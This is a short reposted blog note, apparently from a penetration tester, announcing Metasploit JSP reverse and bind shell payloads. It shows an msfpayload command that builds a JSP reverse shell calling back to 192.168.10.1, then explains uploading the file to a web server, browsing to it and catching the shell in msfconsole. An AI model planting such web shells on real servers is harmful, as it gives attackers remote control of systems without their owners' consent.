From:http://carnal0wnage.attackresearch.com/node/389
Stephen Fewer has pushed up a jsp reverse and jsp bind shell.
http://dev.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles/java
I’m not sure of all the ways to use them but the easiest way is to just output the shell to raw and just upload it to a web server or for an example with an exploit check out the adobe robohelp exploit.
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/http/adobe_robohelper_authbypass.rb
yomomma@c0:~/pentest/msf3.3dev$ ./msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > blah.jsp
From there you can set up your multi handler, browse to your page webpath/blah.jsp and grab your shell.
yomomma@c0:~/pentest/msf3.3dev$ ./msfconsole
阅读全文
作者:skyfire[B.H.S.T]
